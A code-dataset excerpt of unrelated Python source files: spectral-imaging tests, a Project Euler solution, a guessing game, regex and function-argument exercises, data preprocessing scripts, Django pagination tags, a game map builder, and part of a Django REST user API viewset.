map_window(f, X, (3, 5), (10, 50), (20, 40))\n t = np.mean(X[9:12, 18:23].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[0, 0], t)\n\n def test_map_window_clipped(self):\n '''Test spatial averaging near border with clipped window.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (100, None), (100, None), border='clip')\n t = np.mean(X[-2:, -3:].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[-1, -1], t)\n\n def test_map_window_shifted(self):\n '''Test spatial averaging near border with shifted window.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (100, None), (100, None), border='shift')\n t = np.mean(X[-3:, -5:].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[-1, -1], t)\n\n def test_map_window_stepped(self):\n '''Test spatial averaging with non-unity row/column step sizes.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (30, 60, 3), (70, 100, 4), border='shift')\n t = np.mean(X[32:35, 72:77].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[1, 1], t)\n\nclass MapClassesTest(SpyTest):\n '''Test mapping of class indices between classification images.'''\n\n def setup(self):\n self.gt = spy.open_image('92AV3GT.GIS').read_band(0)\n\n def test_map_class_ids_identity(self):\n '''Mapping a class image back to itself should yield identity map.'''\n gt = np.array(self.gt)\n d = map_class_ids(gt, gt)\n for i in set(gt.ravel()):\n assert(i in d)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_identity_unlabeled(self):\n '''Mapping a class image back to itself with an unlabeled class.'''\n gt = np.array(self.gt)\n d = map_class_ids(gt, gt, unlabeled=0)\n for i in set(gt.ravel()):\n assert(i in d)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_identity_multiple_unlabeled(self):\n '''Mapping a class image back to itself with unlabeled classes.'''\n gt = np.array(self.gt)\n d = map_class_ids(gt, gt, unlabeled=[2, 4])\n for i in set(gt.ravel()):\n assert(i in d)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_isomorphic(self):\n '''Test map_class_ids with isomorphic classes.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt, gt2)\n for (i, j) in d.items():\n assert(j == i + 1)\n\n def test_map_class_ids_isomorphic_background(self):\n '''Test map_class_ids with isomorphic classes and background arg.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt, gt2, unlabeled=0)\n assert(d[0] == 0)\n d.pop(0)\n for (i, j) in d.items():\n assert(j == i + 1)\n\n def test_map_class_ids_src_gt_dest(self):\n '''Test map_class_ids with more classes in source image.'''\n gt = np.array(self.gt)\n\n (i, j) = (100, 30)\n old_label = gt[i, j]\n new_label = max(set(gt.ravel())) + 10\n gt2 = np.array(gt)\n gt2[i, j] = new_label\n \n d = map_class_ids(gt2, gt)\n # There are enough pixels for each class that a new single-pixel class\n # should not be mapped to one of the existing classes.\n assert(d[new_label] not in gt)\n d.pop(new_label)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_dest_gt_src(self):\n '''Test map_class_ids with more classes in dest image.'''\n gt = np.array(self.gt)\n\n (i, j) = (100, 30)\n old_label = gt[i, j]\n new_label = max(set(gt.ravel())) + 10\n gt2 = np.array(gt)\n gt2[i, j] = new_label\n \n d = map_class_ids(gt, gt2)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_classes_isomorphic(self):\n '''map_classes should map isomorphic class image back to original.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt2, gt)\n result = map_classes(gt2, d)\n assert(np.alltrue(result == gt))\n \n def test_map_fails_allow_unmapped_false(self):\n '''map_classes should raise ValueError if image has unmapped value.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt2, gt)\n d.pop(1)\n try:\n result = map_classes(gt2, d)\n except ValueError:\n pass\n else:\n assert(False)\n \n def test_map_allow_unmapped_true(self):\n '''map_classes should raise ValueError if image has unmapped value.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt2, gt)\n d.pop(1)\n result = map_classes(gt2, d, allow_unmapped=True)\n assert(np.alltrue(result[gt2 == 1] == 1))\n \ndef run():\n print('\\n' + '-' * 72)\n print('Running spatial tests.')\n print('-' * 72)\n for T in [SpatialWindowTest, MapClassesTest]:\n T().run()\n\nif __name__ == '__main__':\n from spectral.tests.run import parse_args, reset_stats, print_summary\n parse_args()\n reset_stats()\n run()\n print_summary()\n","repo_name":"spectralpython/spectral","sub_path":"spectral/tests/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"75"} +{"seq_id":"40056017147","text":"\"\"\"\r\nLargest palindrome product\r\nProblem 4\r\nPublished on Friday, 16th November 2001, 06:00 pm; Solved by 292716; Difficulty rating: 5%\r\nA palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers \r\nis 9009 = 91 x 99.\r\n\r\nFind the largest palindrome made from the product of two 3-digit numbers.\r\n\"\"\"\r\ndef product_palindrome(lo, hi):\r\n largest = 0\r\n for i in range(lo, hi, 1):\r\n for j in range(lo, hi, 1):\r\n pal = True\r\n backwards = str(i * j)[::-1]\r\n index = 0\r\n for f in str(i * j):\r\n if f != backwards[index]:\r\n pal = False\r\n break\r\n index += 1\r\n if pal == True and (i * j) > largest:\r\n largest = (i * j)\r\n return largest\r\n\r\nprint(product_palindrome(100, 1000))\r\n\r\n\r\n","repo_name":"ggorlen/euler","sub_path":"p004.py","file_name":"p004.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21182896602","text":"import random\nimport jogos\ndef jogar():\n\n print(\"*********************************\")\n print(\"Bem vindo ao jogo de Adivinhação!\")\n print(\"*********************************\")\n numero_secreto = random.randrange(1,101)\n total_de_tentativas = 0\n pontos = 1000\n escolhe_nivel = True\n while escolhe_nivel:\n print(\"Qual nível de dificuldade?\")\n print(\"(1) Fácil (2) Médio (3) Difícil (0) Voltar\")\n nivel = input(\": \")\n if(nivel == '1'):\n total_de_tentativas = 20\n escolhe_nivel = False\n elif(nivel == '2'):\n total_de_tentativas = 10\n escolhe_nivel = False\n elif(nivel == '3'):\n total_de_tentativas = 5\n escolhe_nivel = False\n elif (nivel == '0'):\n jogos.escolhe_jogo()\n escolhe_nivel = False\n else:\n print(\"Entrada invalida!!!\\n\")\n\n for rodada in range(1, total_de_tentativas + 1):\n print(\"Tentativa {} de {}\".format(rodada, total_de_tentativas))\n\n chute_str = input(\"Digite um número entre 1 e 100: \")\n print(\"Você digitou \" , chute_str)\n try:\n chute = int(chute_str)\n except:\n print(\"Você deve digitar um número entre 1 e 100!\")\n #rodada -= 1\n continue\n\n if(chute < 1 or chute > 100):\n print(\"Você deve digitar um número entre 1 e 100!\")\n continue\n\n acertou = chute == numero_secreto\n maior = chute > numero_secreto\n menor = chute < numero_secreto\n\n if(acertou):\n print(\"Você acertou e fez {} pontos!\".format(pontos))\n break\n else:\n if(maior):\n print(\"Você errou! O seu chute foi maior do que o número secreto.\\n\")\n elif(menor):\n print(\"Você errou! O seu chute foi menor do que o número secreto.\")\n pontos_perdidos = abs(numero_secreto - chute)\n pontos = pontos - pontos_perdidos\n if (chute != numero_secreto):\n print(\"O numero correto é {}\".format(numero_secreto))\n\n print(\"Fim do jogo\\n\\n\")\n #jogos.escolhe_jogo()\n jogar()\n\nif(__name__ == \"__main__\"):\n jogar()\n","repo_name":"gilassisoliviera/PYTHON","sub_path":"advinhacao/adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14218387076","text":"# Write a python program to:\n\t# a. Find the sequences of one uppercase letter followed by lowercase letters\n\t# b. Match a word containing z\n\t# c. Match a string containing only uppercase, lowercase letters, numbers and underscores\n\t# d. To remove leading zeros from an IP address\n\nimport re\n\n\ndef sequence_found(text):\n pattern = '[A-Z]+[a-z]+$'\n if re.search(pattern, text):\n print(\"Match Found\")\n else:\n print(\"No Match Found\")\n\n\ndef z_found(text1):\n res = re.findall(r'\\w*z\\w*,\\w*Z\\w*', text1)\n if (len(res) == 0):\n print(\"No Match found\")\n else:\n print(\"Match found, word containing z\")\n print(res)\n\n\ndef specialchar_found(text1):\n patterns = '^[a-zA-z0-9_]*$'\n if re.search(patterns, text1):\n print(\"Found a Match!!\")\n else:\n print(\"Not Matched!!\")\n\n\nwhile (1):\n print(\n \"1. For some sequences of one uppercase letter followed by lowercase letters\"\n )\n print(\"2. For match word containing z\")\n print(\n \"3. For strings containing only uppercase, lowercase letters, numbers and underscores\"\n )\n print(\"4. For to remove leading zeros from an IP address\")\n print(\"5. For exit\")\n print(\"Enter your choice:\", end=\" \")\n choice = int(input())\n if choice == 1:\n st = input(\"Enter a string: \")\n sequence_found(st)\n elif choice == 2:\n st = input(\"Enter a string: \")\n z_found(st)\n elif choice == 3:\n st = input(\"Enter a string: \")\n specialchar_found(st)\n elif choice == 4:\n ip = input(\"Enter an IP address: \")\n ip = \".\" + ip\n print(ip)\n ip = re.sub('\\.[0]', '.', ip)\n ip = ip[1:]\n print(\"IP address after removing leading zeros: \", ip)\n elif choice == 5:\n break\n else:\n print(\"Invalid choice you entered\")","repo_name":"satvik423/programing","sub_path":"python/college/B_p4.py","file_name":"B_p4.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7790276996","text":"import numpy as np\nimport torch\nfrom sklearn import preprocessing\nimport pandas as pd\nfrom .preprocess import StandardScaler\nfrom omegaconf import DictConfig, open_dict\n\n\ndef load_pnc_data(cfg: DictConfig):\n\n ts_data = np.load(cfg.dataset.time_seires, allow_pickle=True)\n pearson_data = np.load(cfg.dataset.node_feature, allow_pickle=True)\n label_df = pd.read_csv(cfg.dataset.label)\n\n pearson_data, timeseries_data = pearson_data.item(), ts_data.item()\n\n pearson_id = pearson_data['id']\n pearson_data = pearson_data['data'][:, :, :]\n id2pearson = dict(zip(pearson_id, pearson_data))\n\n ts_id = timeseries_data['id']\n timeseries_data = timeseries_data['data']\n\n id2gender = dict(zip(label_df['SUBJID'], label_df['sex']))\n\n final_timeseires, final_label, final_pearson = [], [], []\n\n for fc, l in zip(timeseries_data, ts_id):\n if l in id2gender and l in id2pearson:\n final_timeseires.append(fc)\n final_label.append(id2gender[l])\n final_pearson.append(id2pearson[l])\n\n final_pearson = np.array(final_pearson)\n\n final_timeseires = np.array(final_timeseires).transpose(0, 2, 1)\n\n encoder = preprocessing.LabelEncoder()\n\n encoder.fit(label_df[\"sex\"])\n\n labels = encoder.transform(final_label)\n\n # scaler = StandardScaler(mean=np.mean(\n # final_timeseires), std=np.std(final_timeseires))\n\n # final_timeseires = scaler.transform(final_timeseires)\n\n final_timeseires, final_pearson, labels = [np.array(\n data) for data in (final_timeseires, final_pearson, labels)]\n\n final_timeseires, final_pearson, labels = [torch.from_numpy(\n data).float() for data in (final_timeseires, final_pearson, labels)]\n\n with open_dict(cfg):\n cfg.dataset.node_sz, cfg.dataset.node_feature_sz = final_pearson.shape[1:]\n cfg.dataset.timeseries_sz = final_timeseires.shape[2]\n cfg.dataset.num_classes = labels.unique().shape[0]\n\n return final_timeseires, final_pearson, labels\n","repo_name":"Wayfear/Dynamic-Brain-Transformer","sub_path":"source/dataset/pnc.py","file_name":"pnc.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6390769370","text":"from goalguru.soccermatch_package import data\nfrom goalguru.params import *\nfrom pathlib import Path\nimport pandas as pd\n\ndef preprocess():\n \"\"\"\n - Load raw matches datasets from all leagues matches and events, and from\n teams and playeranks\n - Merge matches datasets on teams, events, and playeranks\n - Stack leagues into a a dataset containing all leagues information\n - Creates relevant dataset with features and targets\n \"\"\"\n\n processed_data_path = Path(PROCESSED_DATA_PATH).joinpath(SOCCER_PROJECT)\n data_query_cache_path = Path(processed_data_path).joinpath(f\"{SOCCER_PROJECT}-matches_processed.csv\")\n if not data_query_cache_path.is_file():\n matches, events, playerank, teams = data.load_data()\n\n all_matches =data.merge_data(matches,\n events,\n playerank,\n teams)\n\n all_matches = data.create_features(all_matches)\n\n matches_cleaned = data.clean_data(all_matches)\n\n X = matches_cleaned[FEATURES]\n y = matches_cleaned[TARGET]\n\n data.save_data(matches_cleaned,\n f'{SOCCER_PROJECT}-matches_processed.csv',\n processed_data_path,\n 'Saved processed matches locally')\n data.save_data(X,\n f'{SOCCER_PROJECT}-X_processed.csv',\n processed_data_path,\n 'Saved X processed locally')\n data.save_data(y,\n f'{SOCCER_PROJECT}-y_processed.csv',\n processed_data_path,\n 'Saved y processed locally')\n else:\n print(f\"✅ Data processed already\")\n","repo_name":"jotanavarrete/goalguru","sub_path":"goalguru/interface/main_copy.py","file_name":"main_copy.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14044074920","text":"from config import *\n\n\"\"\"\nВайман Ангелина 28.12.2021. Создана функция create_map\"\n\nПавлов Тимур 29.12.2021. Немного переработал функцию create_map\n\nВайман Ангелина 03.01.2022. Создана функция create_minimap\n\nБатталов Арслан 03.01.2022. Добавлена карта коллизии\n\nБатталов Арслан 08.01.2022. Добавлена поддержка разных текстур стен\n\nПавлов Тимур 08.01.2021. Создан метод create_sprites_map\n\"\"\"\n\n\ndef create_map(map_):\n WORLD_MAP.clear()\n for row_index, row in enumerate(map_):\n for col_index, el in enumerate(row):\n if el in WALL_CHARS:\n x, y = col_index * TILE, row_index * TILE\n WORLD_MAP[(x, y)] = el\n\n\ndef create_minimap(map_):\n MINI_MAP.clear()\n for row_index, row in enumerate(map_):\n for col_index, el in enumerate(row):\n if el in WALL_CHARS:\n x, y = col_index * MAP_TILE, row_index * MAP_TILE\n MINI_MAP.add((x, y))\n","repo_name":"OCCCAS/YOOM","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"20846062720","text":"# Variables Length Parameters (or) arguments\n__Properties = '''When we have familiy of multiple function calls with Variable number of values / arguments then \nwith normal python programming, we must define mutiple function defintions. This process leads to more\ndevelopment time. \n\nTo overcome this process, we must use the concept of Variable length Parameters .\n\nTo Impelement, Variable length Parameters concept, we must define single Function Definition and takes a formal Parameter \npreceded with a symbol called astrisk ( * param) and the formal parameter with astrisk symbol is called Variable length \nParameters and whose purpose is to hold / store any number of values coming from similar function calls and whose type \nis .\n\n---------------------------------------------------------------------------------------------------\nSyntax for function definition with Variables Length Parameters:\n--------------------------------------------------------------------------------------------------\n\tdef functionname(list of formal params, *param1,param2=value) :\n\t --------------------------------------------------\n\t\t--------------------------------------------------\n\nHere *param1 is called Variable Length parameter and it can hold any number of argument values (or) variable number of \nargument values and *param1 type is \n\nRule:- The *param1 must always written at last part of Function Heading and it must be only one (but not multiple)\n\nRule:- When we use Variable length and default parameters in function Heading, we use default parameter as last and \nbefore we use variable length parameter and in function calls, we should not use default parameter as Key word argument \nbcoz Variable number of values are treated as Posstional Argument Value(s) .'''\n\n# Example:\n\n# Program for demonstrating variable Length arguments\n'''This Program will not execute as it as bcoz PVM is remebers Latest Function definition only bcoz PVM performs Interpretation \nProcess.'''\ndef disp(a,b,c,d,e): # Function Def-1\n\tprint(a,b,c,d,e)\n\ndef disp(a,b,c,d): # Function Def-2\n\tprint(a,b,c,d)\n\ndef disp(a,b,c): # Function Def-3\n\tprint(a,b,c)\n\ndef disp(a,b): # Function Def-4\n\tprint(a,b)\n\ndef disp(a): # Function Def-5\n\tprint(a)\n\n# Main Program\ndisp(10,20,30,40,50) # Function Call-1\ndisp(10,20,30,40) # Function Call-2\ndisp(10,20,30) # Function Call-3\ndisp(10,20) # Function Call-4\ndisp(10) # Function Call-5\n\n# Program for demonstrating variable Length arguments\n# This Program will execute as it as\ndef diplay(a, b, c, d, e):\n print(a, b, c, d, e)\n\ndiplay(10, 20, 30, 40, 50)\n\ndef diplay(a, b, c, d):\n print(a, b, c, d)\n\ndiplay(10, 20, 30, 40)\n\ndef diplay(a, b, c):\n print(a, b, c)\n\ndiplay(10, 20, 30)\n\ndef diplay(a, b):\n print(a, b)\n\ndiplay(10, 20)\n\ndef diplay(a):\n print(a)\n\ndiplay(10)\n\n\n# Program for demonstrating variable Length arguments\ndef disp(*a): # here *a is called variable Length Param and whose type is \n print(a, type(a))\n# Main Program\ndisp(10,20,30,40,50) # Function Call-1\ndisp(10,20,30,40) # Function Call-2\ndisp(10,20,30) # Function Call-3\ndisp(10,20) # Function Call-4\ndisp(10) # Function Call-5\n\n# Program for demonstrating variable Length arguments\ndef disp(*a): # here *a is called variable Length Param and whose type is \n print(\"-\"*100)\n print(\"Number of Values = {}\".format(len(a)))\n print(\"-\"*100)\n for val in a:\n print(val,type(val))\n print(\"-\"*100)\n# Main Program\ndisp(10,20,30,40,50) # Function Call-1\ndisp(10,20,30,40) # Function Call-2\ndisp(10,20,30) # Function Call-3\ndisp(10,20) # Function Call-4\ndisp(10) # Function Call-5\n\n\n# Program for demonstrating variable Length arguments\ndef display(sno, subname, *val): # here *val is called variable Length Param and whose type is \n print(\"-\"*90)\n print(\"Student Number = {}\".format(sno))\n print(\"Subject Name = {}\".format(subname))\n print(\"-\"*90)\n s = 0\n for i in val:\n print(\"\\t{}\".format(i))\n s = s + i\n print(\"-\" * 90)\n print(\"\\tSum = {}\".format(s))\n print(\"-\" * 90)\n# Main Program\ndisplay(100, \"PYTHON\", 10, 20, 30, 40, 50) # Function Call-1 with 5 args\ndisplay(200, \"JAVA\", 10, 20, 30, 40) # Function Call-2 with 4 args\ndisplay(300, \"C++\", 10, 20, 30) # Function Call-3 with 3 args\ndisplay(400, \"C\", 10, 20) # Function Call-4 with 2 args\ndisplay(500, \"C#.net\", 10) # Function Call-5 with 1 args\ndisplay(600, \"JAVA Script\") # Function Call-6 with no args\n\n\n# Program for demonstrating variable Length arguments\ndef disp(pno, pname, *vals, pgun = \"AK-47\"):\n print(\"-\"*70)\n print(\"Player Number = {}\".format(pno))\n print(\"Player Name = {}\".format(pname))\n print(\"Player Gun = {}\".format(pgun))\n print(\"-\" * 70)\n s = 0\n for val in vals:\n print(\"\\t{}\".format(val))\n s = s + val\n print(\"-\" * 70)\n print(\"\\tSum = {}\".format(s))\n print(\"-\" * 70)\n# Main Program\ndisp(1, \"Maverick\", 10, 20, 30, 40, 50) # Function Call-1 with 5 args\ndisp(2, \"Maniac\", 10, 20, 30, 40) # Function Call-2 with 4 args\ndisp(3, \"Rabel\", 10, 20, 30) # Function Call-3 with 3 args\ndisp(4, \"Vandal\", 10, 20) # Function Call-4 with 2 args\ndisp(5, \"Tex\", 10) # Function Call-5 with 1 args\n\n\n# Program for demonstrating non-variable Length arguments\ndef disp1(a, b, c, d, e): # Function Def-1\n print(a, b, c, d, e)\n\ndef disp2(a, b, c, d): # Function Def-2\n print(a, b, c, d)\n\ndef disp3(a, b, c): # Function Def-3\n print(a, b, c)\n\ndef disp4(a, b): # Function Def-4\n print(a, b)\n\ndef disp5(a): # Function Def-5\n print(a)\n\n#main program\ndisp1(10,20,30,40,50) # Function Call-1\ndisp2(10,20,30,40) # Function Call-2\ndisp3(10,20,30) # Function Call-3\ndisp4(10,20) # Function Call-4\ndisp5(10) # Function Call-5\n\n","repo_name":"1Priyans/PYTHON-","sub_path":"Phase 2/Function in Python/Types of Arguments/Variables Length Parameters (or) arguments.py","file_name":"Variables Length Parameters (or) arguments.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29893990703","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef url_page_replace(request, field, value):\n dict_ = request.GET.copy()\n dict_[field] = str(value)\n return dict_.urlencode()\n\n\n@register.simple_tag\ndef url_order_by(request, **kwargs):\n dict_ = request.GET.copy()\n for k, v in kwargs.items():\n dict_[k] = v\n direction = dict_.get('dir')\n if direction is None:\n direction = dict_.get('default_direction', 'up')\n if direction == 'down':\n direction = 'up'\n elif direction == 'up':\n direction = 'down'\n else:\n direction = ''\n dict_['dir'] = direction\n return dict_.urlencode()\n","repo_name":"nerosketch/djing","sub_path":"djing/templatetags/dpagination.py","file_name":"dpagination.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"75"} +{"seq_id":"43183674767","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\nfrom rest_framework import viewsets, filters, status, mixins\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.reverse import reverse\nfrom rest_framework_extensions.mixins import DetailSerializerMixin\n\nfrom shoutit.api.permissions import IsOwnerModify, IsOwner\nfrom shoutit.api.v2.views.shout_views import ShoutViewSet\nfrom shoutit.controllers import listen_controller, message_controller, facebook_controller, gplus_controller\nfrom shoutit.models import User, ShoutIndex\nfrom . import DEFAULT_PARSER_CLASSES_v2\nfrom ..filters import HomeFilterBackend\nfrom ..pagination import (ShoutitPaginationMixin, PageNumberIndexPagination, ShoutitPageNumberPaginationNoCount)\nfrom ..serializers import (UserSerializer, UserDetailSerializer, MessageSerializer, ShoutSerializer,\n TagDetailSerializer, UserDeactivationSerializer)\n\n\nclass UserViewSet(DetailSerializerMixin, ShoutitPaginationMixin, mixins.ListModelMixin, viewsets.GenericViewSet):\n \"\"\"\n User API Resource.\n \"\"\"\n lookup_field = 'username'\n lookup_value_regex = '[0-9a-zA-Z._]+'\n parser_classes = DEFAULT_PARSER_CLASSES_v2\n serializer_class = UserSerializer\n serializer_detail_class = UserDetailSerializer\n queryset = User.objects.filter(is_active=True, is_activated=True)\n queryset_detail = User.objects.filter(is_active=True).select_related('profile', 'page')\n pagination_class = ShoutitPageNumberPaginationNoCount\n filter_backends = (filters.DjangoFilterBackend, filters.SearchFilter)\n filter_fields = ('username', 'email')\n search_fields = ('=id', 'username', 'first_name', 'last_name', '=email')\n permission_classes = (IsAuthenticatedOrReadOnly, IsOwnerModify)\n\n def get_object(self):\n username = self.kwargs.get(self.lookup_field)\n if self.request.user.is_authenticated():\n if username == 'me' or username == self.request.user.username:\n return self.request.user\n return super(UserViewSet, self).get_object()\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n List Users based on `search` query param\n\n ###Response\n
\n        {\n          \"next\": null, // next results page url\n          \"previous\": null, // previous results page url\n          \"results\": [] // list of {UserSerializer}\n        }\n        
\n ---\n serializer: UserSerializer\n parameters:\n - name: search\n paramType: query\n \"\"\"\n return super(UserViewSet, self).list(request, *args, **kwargs)\n\n def retrieve(self, request, *args, **kwargs):\n \"\"\"\n Retrieve a User\n ---\n serializer: UserDetailSerializer\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n \"\"\"\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def partial_update(self, request, *args, **kwargs):\n \"\"\"\n Modify a User\n ###REQUIRES AUTH\n ###Request\n Specify any or all of these attributes to change them.\n ####Body\n
\n        {\n            \"username\": \"mo\",\n            \"email\": \"mo.chawich@gmail.com\",\n            \"website\": \"https://www.shoutit.com\",\n            \"first_name\": \"Mo\",\n            \"last_name\": \"Chawich\",\n            \"bio\": \"I'm a good shouter\",\n            \"gender\": \"male\",\n            \"image\": \"https://user-image.static.shoutit.com/user_uuid-timestamp.jpg\",\n            \"cover\": \"https://user-image.static.shoutit.com/user_uuid-timestamp.jpg\",\n            \"location\": {\n                \"latitude\": 25.1593957,\n                \"longitude\": 55.2338326,\n                \"address\": \"Whatever Street 31\"\n            },\n            \"video\": {\n                \"url\": \"https://shout-image.static.shoutit.com/38CB868F-B0C8-4B41-AF5A-F57C9FC666C7-1447616915.mp4\",\n                \"thumbnail_url\": \"https://shout-image.static.shoutit.com/38CB868F-B0C8-4B41-AF5A-F57C9FC666C7-1447616915_thumbnail.jpg\",\n                \"provider\": \"shoutit_s3\",\n                \"id_on_provider\": \"38CB868F-B0C8-4B41-AF5A-F57C9FC666C7-1447616915\",\n                \"duration\": 12\n            },\n            \"push_tokens\": {\n                \"apns\": \"56yhnjflsdjfirjeoifjsorj4o\",\n                \"gcm\": \"asjkdhsakjdhi3uhekndkjadkjsak\"\n            }\n        }\n        
\n\n For `location` it is enough to pass `latitude` and `longitude` and the other location attributes such as:\n `country`, `state`, `city`, `postal_code` and `address` will be automatically filled by the API. Passing `address`\n will override the auto-filled one by server. `address` can be also sent alone, this way only saved address will be replaced not other attributes.\n\n ###Deleting video and/or push_tokens\n Set them as `null`\n ####Body\n
\n        {\n            \"video\": null,\n            \"push_tokens\": {\n                \"apns\": null,\n                \"gcm\": null\n            }\n        }\n        
\n ---\n serializer: UserDetailSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: body\n paramType: body\n \"\"\"\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n\n def destroy(self, request, *args, **kwargs):\n \"\"\"\n Delete a User and everything attached to him\n ###REQUIRES AUTH\n ```\n NOT IMPLEMENTED AND ONLY USED FOR TEST USERS\n ```\n ---\n omit_serializer: true\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n \"\"\"\n user = self.get_object()\n if user.is_test:\n user.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(status=status.HTTP_406_NOT_ACCEPTABLE)\n\n @detail_route(methods=['post', 'delete'], permission_classes=(IsAuthenticatedOrReadOnly,), suffix='Listen')\n def listen(self, request, *args, **kwargs):\n \"\"\"\n Start/Stop listening to a User\n ###REQUIRES AUTH\n ###Start listening\n
\n        POST: /v2/users/{username}/listen\n        
\n\n ###Stop listening\n
\n        DELETE: /v2/users/{username}/listen\n        
\n ---\n omit_serializer: true\n omit_parameters:\n - form\n \"\"\"\n user = self.get_object()\n ap = user.ap\n api_client = getattr(request, 'api_client', None)\n\n if request.user == user:\n raise ValidationError({'error': \"You can not listen to your self\"})\n\n if request.method == 'POST':\n listen_controller.listen_to_object(request.user, ap, api_client=api_client, api_version=request.version)\n msg = \"you started listening to {} shouts\".format(user.name)\n _status = status.HTTP_201_CREATED\n else:\n listen_controller.stop_listening_to_object(request.user, ap)\n msg = \"you stopped listening to {} shouts\".format(user.name)\n _status = status.HTTP_202_ACCEPTED\n ret = {\n 'data': {'success': msg},\n 'status': _status\n }\n return Response(**ret)\n\n @detail_route(methods=['get'], suffix='Listeners')\n def listeners(self, request, *args, **kwargs):\n \"\"\"\n List the User listeners\n ###Response\n
\n        {\n          \"next\": null, // next results page url\n          \"previous\": null, // previous results page url\n          \"results\": [] // list of {UserSerializer}\n        }\n        
\n ---\n serializer: UserSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: page\n paramType: query\n - name: page_size\n paramType: query\n \"\"\"\n user = self.get_object()\n listeners = listen_controller.get_object_listeners(user.ap)\n page = self.paginate_queryset(listeners)\n serializer = UserSerializer(page, many=True, context={'request': request})\n return self.get_paginated_response(serializer.data)\n\n @detail_route(methods=['get'], suffix='Listening')\n def listening(self, request, *args, **kwargs):\n \"\"\"\n List the User listening based on `type` query param. It could be either 'users' or 'tags', default is 'users'\n ###Response\n
\n        {\n          \"next\": null, // next results page url\n          \"previous\": null, // previous results page url\n          \"results\": [] // list of {UserSerializer} same as in listeners or {TagDetailSerializer}\n        }\n        
\n\n ---\n serializer: TagDetailSerializer\n omit_parameters:\n - form\n parameters:\n - name: username\n description: me for logged in user\n paramType: path\n required: true\n defaultValue: me\n - name: type\n description:\n paramType: query\n required: true\n defaultValue: users\n enum:\n - users\n - pages\n - tags\n - name: page\n paramType: query\n - name: page_size\n paramType: query\n \"\"\"\n\n listening_type = request.query_params.get('type', 'users')\n if listening_type not in ['users', 'pages', 'tags']:\n raise ValidationError({'type': \"should be `users`, `pages` or `tags`\"})\n\n user = self.get_object()\n listening = getattr(user, 'listening2_' + listening_type)\n\n # we do not use the view pagination class since we need one with custom results field\n self.pagination_class = self.get_custom_shoutit_page_number_pagination_class(\n custom_results_field=listening_type)\n page = self.paginate_queryset(listening)\n\n result_object_serializers = {\n 'users': UserSerializer,\n 'pages': UserSerializer,\n 'tags': TagDetailSerializer,\n }\n result_object_serializer = result_object_serializers[listening_type]\n serializer = result_object_serializer(page, many=True, context={'request': request})\n\n return self.get_paginated_response(serializer.data)\n\n @detail_route(methods=['get'], permission_classes=(IsAuthenticated, IsOwner), suffix='Home')\n def home(self, request, *args, **kwargs):\n \"\"\"\n List the User homepage shouts. User can't see the homepage of other users.\n [Shouts Pagination](https://docs.google.com/document/d/1Zp9Ks3OwBQbgaDRqaULfMDHB-eg9as6_wHyvrAWa8u0/edit#heading=h.97r3lxfv95pj)\n 